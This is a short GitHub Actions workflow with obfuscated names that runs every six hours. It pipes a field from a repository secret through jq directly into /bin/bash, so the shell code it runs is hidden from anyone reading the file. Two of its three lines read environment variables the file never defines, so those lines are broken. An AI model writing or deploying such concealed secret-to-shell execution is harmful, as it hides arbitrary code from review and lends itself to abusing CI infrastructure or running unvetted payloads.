name: hongqikx

on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hongqikx
        env:
          ahuw472: ${{ secrets.ahuw472 }}
        run: |
          echo $ahuw472 | jq -r .gdz139 | /bin/bash
          echo $la86 | jq -r .sqvwp09402 | /bin/bash
          echo $bxpge32 | jq -r .z6 | /bin/bash

